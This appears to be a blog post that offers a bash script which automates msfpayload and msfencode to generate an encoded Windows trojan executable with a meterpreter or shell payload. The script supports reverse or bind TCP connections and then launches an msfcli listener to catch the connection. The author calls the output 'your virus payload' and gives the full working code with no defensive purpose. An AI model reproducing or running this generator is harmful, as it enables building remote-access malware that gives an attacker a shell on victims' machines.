Library Guide

Script to simple using msfpayload msfencode to create metasploit payload trojans

Script to simple using msfpayload msfencode to create metasploit payload trojans

The following is a script I coded to simplify the ease of use for using msfpayload and msfencode to create a windows based trojan and set up the listener. Lets face it, scripting is faster and easier. Also insures it is uniform and automated.

The script will do the following:

• Determine your IP address automatically for the LHOST of the payload.
  
• Ask if you want a shell or meterpreter
• Ask if you want it reverse connection or Bind port TCP
• Request the Port number.
• at that point it will create two files
• trojan.exe - your virus payload
• msf_Trojan_Listener - a file with a one liner to create the metasploit listener that works with your payload.
• Next it will start msfcli to create a listener.

Here is a screenshot of it in action:




And of course, youll probably want the code so here it is. ;-)
==================================================================
#!/bin/bash
ENCODINGTIMES=5
IP=`ifconfig | grep inet addr | grep -v 127.0.0.1 | cut -d: -f2 | awk {print $1}`
echo -e " #######################################"
echo "# MSF Trojan Generator v1.0 #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e " Your IP = " $IP
echo -e -n " what type of trojan? 1) meterpreter 2) shell Which is it: "
read METERORSHELL
echo -e -n " What kind of trojan? 1) Reverse Connection 2) bind_TCP Which is it: "
read LISTENORREVERSE
echo -e -n " What port number are we going to use: "
read PORTNUM

if [ $LISTENORREVERSE = "1" ]; then
 LORR=reverse_tcp
 LHOST=LHOST=
else
 LORR=bind_tcp
 LHOST=
 IP=
 echo -e " Since you want a bind port what is the IP of the remote host: "
 read REMOTEHOST
 RH=RHOST=
fi

if [ $METERORSHELL = "1" ]; then
 SHELLTYPE=meterpreter
else
SHELLTYPE=shell
fi

echo -e " [*] Generating trojan with the following: -"$SHELLTYPE"/"$LORR " -"$LHOST$IP$RH$REMOTEHOST " -PORT=" $PORTNUM
echo -e " this can take some time. Please wait... "

msfpayload windows/$SHELLTYPE/$LORR $LHOST$IP LPORT=$PORTNUM R | msfencode -t exe -o ./trojan.exe -c $ENCODINGTIMES
echo -e " [*] Done generating `pwd`/trojan.exe! "
ls -l trojan.exe
echo -e " [*] Now running listener: msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E NOTE: also saving this to `pwd`/msf_Trojan_Listener for a simple cat/paste later."
echo "msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E" > msf_Trojan_Listener
msfcli multi/handler PAYLOAD=windows/$SHELLTYPE/$LORR $LHOST$IP$RH$REMOTEHOST LPORT=$PORTNUM E

==================================================================

download file now